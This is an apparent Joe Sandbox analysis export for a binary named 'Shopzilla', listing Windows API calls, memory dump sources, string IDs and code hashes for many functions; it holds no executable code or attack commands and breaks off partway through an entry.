                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C008D3,?,00000001), ref: 00C01927
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: b82f698da60d2c2d4c2540510f56fd493c0461de02dcfcc9176262022c608ad4
                                              • Instruction ID: 77713f8deca65b7efb721e098b0b2c3706fb7e50eb6465978d1917339835a20d
                                              • Opcode Fuzzy Hash: b82f698da60d2c2d4c2540510f56fd493c0461de02dcfcc9176262022c608ad4
                                              • Instruction Fuzzy Hash: 9C31BF72500208ABEB219F95DC68FBDB7ADEB55329F244619FD10C62D0D7B49E40CB51
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00BA260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00BA2617
                                              • SetBkMode.GDI32(?,00000001), ref: 00BA262C
                                              • GetStockObject.GDI32(00000005), ref: 00BA2634
                                              • GetClientRect.USER32(?), ref: 00BDC02C
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BDC043
                                              • GetWindowDC.USER32(?), ref: 00BDC04F
                                              • GetPixel.GDI32(00000000,?,?), ref: 00BDC05E
                                              • ReleaseDC.USER32(?,00000000), ref: 00BDC070
                                              • GetSysColor.USER32(00000005), ref: 00BDC08E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                              • String ID:
                                              • API String ID: 3430376129-0
                                              • Opcode ID: f4506405dfd24732bf0879407a0d2b74e63a522369b13ecd54d5354171665547
                                              • Instruction ID: 576ef52f4214dacfb0b460a9070c9156a173244c8f335f5641a8fcda001fd6fa
                                              • Opcode Fuzzy Hash: f4506405dfd24732bf0879407a0d2b74e63a522369b13ecd54d5354171665547
                                              • Instruction Fuzzy Hash: A0118B32510205FFDB616FA8EC19BED7BB6FB09321F2042A5FA26950E1CB310951EF10
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BAADE1
                                              • OleUninitialize.OLE32(?,00000000), ref: 00BAAE80
                                              • UnregisterHotKey.USER32(?), ref: 00BAAFD7
                                              • DestroyWindow.USER32(?), ref: 00BE2E94
                                              • FreeLibrary.KERNEL32(?), ref: 00BE2EF9
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE2F26
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 20cf6800f66527c771a26640f1ffda6e5a71d97857a097c3783b45f66fe47472
                                              • Instruction ID: df751dd9ba067131b04042a11d8a71310f20dc89190e268ab3742a8eea444a00
                                              • Opcode Fuzzy Hash: 20cf6800f66527c771a26640f1ffda6e5a71d97857a097c3783b45f66fe47472
                                              • Instruction Fuzzy Hash: 4AA139317152128FCB29EF15C895B69F7E4EF15700F1442EDE80AAB261CB31AD56CF91
                                              APIs
                                              • EnumChildWindows.USER32(?,00BFAF1D), ref: 00BFAE5B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: ad6f5dc3022f6d92e508ee9cf707502b69f6e5ee0682765ca90346094c2c8ba5
                                              • Instruction ID: 59b6e54863e18a2406e1e58409ffee5e279020e879e6b819319596dc628a250f
                                              • Opcode Fuzzy Hash: ad6f5dc3022f6d92e508ee9cf707502b69f6e5ee0682765ca90346094c2c8ba5
                                              • Instruction Fuzzy Hash: 879171B4500109ABCB0CEF60C491BFABBE9FF44300F5081A9DA5EA7241DF70A95DDB91
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00BA327E
                                                • Part of subcall function 00BA218F: GetClientRect.USER32(?,?), ref: 00BA21B8
                                                • Part of subcall function 00BA218F: GetWindowRect.USER32(?,?), ref: 00BA21F9
                                                • Part of subcall function 00BA218F: ScreenToClient.USER32(?,?), ref: 00BA2221
                                              • GetDC.USER32 ref: 00BDCFA3
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BDCFB6
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BDCFC4
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BDCFD9
                                              • ReleaseDC.USER32(?,00000000), ref: 00BDCFE1
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BDD06C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: c257694c1a9abe6cac7975fe20439526358fe4fb9f69b4fa345cbb126439836f
                                              • Instruction ID: fb4c0e06e6681e41fb4cd71799753fe0d5004c4661fcee3c07e70a975ce507cc
                                              • Opcode Fuzzy Hash: c257694c1a9abe6cac7975fe20439526358fe4fb9f69b4fa345cbb126439836f
                                              • Instruction Fuzzy Hash: C871D231504205EFCF218F64C894BFABBF5FF89310F1442AAFD955A2A6E7319842DB60
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                                • Part of subcall function 00BA2714: GetCursorPos.USER32(?), ref: 00BA2727
                                                • Part of subcall function 00BA2714: ScreenToClient.USER32(00C667B0,?), ref: 00BA2744
                                                • Part of subcall function 00BA2714: GetAsyncKeyState.USER32(00000001), ref: 00BA2769
                                                • Part of subcall function 00BA2714: GetAsyncKeyState.USER32(00000002), ref: 00BA2777
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C2C417
                                              • ImageList_EndDrag.COMCTL32 ref: 00C2C41D
                                              • ReleaseCapture.USER32 ref: 00C2C423
                                              • SetWindowTextW.USER32(?,00000000), ref: 00C2C4CD
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C2C4E0
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C2C5C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                              • API String ID: 1924731296-2107944366
                                              • Opcode ID: 443cff964d1574c9e7925478e4256364012fce10f11246ce3d1c5d5750b5b89a
                                              • Instruction ID: 32060bac0b3de0f9ebd69ec68aeaae8ec1b960a5a06ce0a560d154e82da61b08
                                              • Opcode Fuzzy Hash: 443cff964d1574c9e7925478e4256364012fce10f11246ce3d1c5d5750b5b89a
                                              • Instruction Fuzzy Hash: F4518B71208305AFDB14EF24DCA6F6E7BE1EF88310F104929F995872E1CB71A954DB92
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C30980), ref: 00C191DA
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C30980), ref: 00C1920E
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C19388
                                              • SysFreeString.OLEAUT32(?), ref: 00C193B2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: fe6eddc8a3fb48c722e348f827417aedc35c7d5aaf5f7ddf7f87570681b6796f
                                              • Instruction ID: 3d601f00fb67a4d3753296b0f48d8519416b7737df829c1734c25276f86183e3
                                              • Opcode Fuzzy Hash: fe6eddc8a3fb48c722e348f827417aedc35c7d5aaf5f7ddf7f87570681b6796f
                                              • Instruction Fuzzy Hash: FBF13C71A00109EFDB04DF94C894EEEB7B9FF86314F148198F915AB291D731AE86DB50
                                              APIs
                                                • Part of subcall function 00C04A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C039F7,?), ref: 00C04A4D
                                                • Part of subcall function 00C04A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C039F7,?), ref: 00C04A66
                                                • Part of subcall function 00C04E59: GetFileAttributesW.KERNELBASE(?,00C03A6B), ref: 00C04E5A
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00C05168
                                              • _wcscmp.LIBCMT ref: 00C05182
                                              • MoveFileW.KERNEL32(?,?), ref: 00C0519D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 19f2628d000133d9cfd6a45ad46b96589b8e94fd2bc0e7c75d9381dc196551f3
                                              • Instruction ID: 6422db14d5f33d4810c4eea014dfd0bb0bcd94579a715b9c74d8c4cd0fbc4bca
                                              • Opcode Fuzzy Hash: 19f2628d000133d9cfd6a45ad46b96589b8e94fd2bc0e7c75d9381dc196551f3
                                              • Instruction Fuzzy Hash: 0B5186B24087859BC724DB94DC91ADFB3ECAF84340F50492EF699D3191EF70A688CB56
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C28AEC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 249fe535b1ae4931dd0622020a5fb8282679760087d14b3e602feba2ea4aac47
                                              • Instruction ID: 4d8e76252d2904d47194052920df7b2e7a52f0d93b2dd607eceb3bafb83db485
                                              • Opcode Fuzzy Hash: 249fe535b1ae4931dd0622020a5fb8282679760087d14b3e602feba2ea4aac47
                                              • Instruction Fuzzy Hash: 7B51B3B0503224FFEF209F29EC85B5D7BA4AB05350F204516F624E69E1CF75AA98DB50
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BDC568
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDC58A
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BDC5A2
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BDC5C0
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BDC5E1
                                              • DestroyIcon.USER32(00000000), ref: 00BDC5F0
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BDC60D
                                              • DestroyIcon.USER32(?), ref: 00BDC61C
                                                • Part of subcall function 00C2A89C: DeleteObject.GDI32(00000000), ref: 00C2A8D5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2819616528-0
                                              • Opcode ID: 6156cd9b51248f2864176984c6cc1a9122726574e9f6b00342bb4d18d5f4eb1e
                                              • Instruction ID: e878bcab78c2540ec77d26aec706887a2610c16731fd510d98c947e694b90ea2
                                              • Opcode Fuzzy Hash: 6156cd9b51248f2864176984c6cc1a9122726574e9f6b00342bb4d18d5f4eb1e
                                              • Instruction Fuzzy Hash: 5B517C7060420AAFDB24DF28DC86BAABBF5FB59310F1045A9F942972D0E771ED50DB50
                                              APIs
                                                • Part of subcall function 00BFB310: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFB330
                                                • Part of subcall function 00BFB310: GetCurrentThreadId.KERNEL32 ref: 00BFB337
                                                • Part of subcall function 00BFB310: AttachThreadInput.USER32(00000000,?,00BFA01E,?,00000001), ref: 00BFB33E
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BFA029
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BFA046
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00BFA049
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BFA052
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BFA070
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BFA073
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BFA07C
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BFA093
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BFA096
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 7d7cfa4d2c8a7f4fd27f4b99b22cb673279a2c0f5cd2f1fc80189dc4aef992da
                                              • Instruction ID: 4e28e2364c38c4d7ef7d10515e7a8c2e29f0032a61734c3dd983dd7386e5723c
                                              • Opcode Fuzzy Hash: 7d7cfa4d2c8a7f4fd27f4b99b22cb673279a2c0f5cd2f1fc80189dc4aef992da
                                              • Instruction Fuzzy Hash: 731104B2960618BEF6106F60DC8AF6E7F6DEB4CB51F200419F744AB090CAF25C509AA4
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF92C5
                                              • HeapAlloc.KERNEL32(00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF92CC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BF8F3D,00000B00,?,?), ref: 00BF92E1
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF92E9
                                              • DuplicateHandle.KERNEL32(00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF92EC
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BF8F3D,00000B00,?,?), ref: 00BF92FC
                                              • GetCurrentProcess.KERNEL32(00BF8F3D,00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF9304
                                              • DuplicateHandle.KERNEL32(00000000,?,00BF8F3D,00000B00,?,?), ref: 00BF9307
                                              • CreateThread.KERNEL32(00000000,00000000,00BF932D,00000000,00000000,00000000), ref: 00BF9321
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: fe88c1aa0a3b29188b042d5b726d7db493519e0f3fe402b92b6cc0fc6d44d381
                                              • Instruction ID: c6176d50d787fe6173ec8e0cf38f5a6fcffd7bebabe995cd22c9dd9dafb46cdd
                                              • Opcode Fuzzy Hash: fe88c1aa0a3b29188b042d5b726d7db493519e0f3fe402b92b6cc0fc6d44d381
                                              • Instruction Fuzzy Hash: A001B6B6250308BFE710ABA5DC4DF6F7BACEB88B11F508411FA05DB2A1CA719804DB20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: e2634442c8122bbf03629f175f2a3bc42000cefd3bc3b5923863c83d31e5d5f5
                                              • Instruction ID: ddc74801abe5014486f02f5e1a4c804c58380cc10d140ce46eca7c07bc455d84
                                              • Opcode Fuzzy Hash: e2634442c8122bbf03629f175f2a3bc42000cefd3bc3b5923863c83d31e5d5f5
                                              • Instruction Fuzzy Hash: 1C919E71A00219EBDF24CFA5C854FEEBBB8EF46714F108159F515AB281D7709A84DFA0
                                              APIs
                                                • Part of subcall function 00BF7B0B: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?,?,00BF7E56), ref: 00BF7B28
                                                • Part of subcall function 00BF7B0B: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?), ref: 00BF7B43
                                                • Part of subcall function 00BF7B0B: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?), ref: 00BF7B51
                                                • Part of subcall function 00BF7B0B: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?), ref: 00BF7B61
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C19CB8
                                              • _memset.LIBCMT ref: 00C19CC5
                                              • _memset.LIBCMT ref: 00C19E08
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C19E34
                                              • CoTaskMemFree.OLE32(?), ref: 00C19E3F
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00C19E8D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: b2900039ad4aaedb8a5f0e9c2b8091816741836169a0211786bab8e573f91aa6
                                              • Instruction ID: 52493ab0b1ca7804e150e799a4aaad29c6665bcb9de91eb9c7593abc755015b1
                                              • Opcode Fuzzy Hash: b2900039ad4aaedb8a5f0e9c2b8091816741836169a0211786bab8e573f91aa6
                                              • Instruction Fuzzy Hash: C3915971D00219EBCB10DFA5D894EEEBBB9FF09310F10415AF519A7281DB709A84CFA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C27211
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C27225
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C2723F
                                              • _wcscat.LIBCMT ref: 00C2729A
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C272B1
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C272DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
